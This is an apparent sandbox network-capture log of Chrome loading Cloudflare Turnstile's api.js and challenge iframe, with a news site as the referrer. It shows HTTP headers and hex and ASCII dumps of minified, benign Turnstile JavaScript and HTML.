                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                              Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                                                              Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                                                              Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                                                              2024-11-18 16:55:47 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                                                              Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.1749728104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:48 UTC383OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:48 UTC471INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:48 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 47672
                                                                                                                              Connection: close
                                                                                                                              accept-ranges: bytes
                                                                                                                              last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                              access-control-allow-origin: *
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d80fad2a91e-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:48 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                              Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                              Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                              Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                                                              Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                                                              Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                                                              Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.1749729104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:48 UTC800OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:48 UTC1362INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Content-Length: 26596
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              origin-agent-cluster: ?1
                                                                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                              referrer-policy: same-origin
                                                                                                                              document-policy: js-profiling
                                                                                                                              2024-11-18 16:55:48 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 34 39 37 64 38 31 33 63 62 36 32 66 66 34 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: Server: cloudflareCF-RAY: 8e497d813cb62ff4-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:48 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                              2024-11-18 16:55:48 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
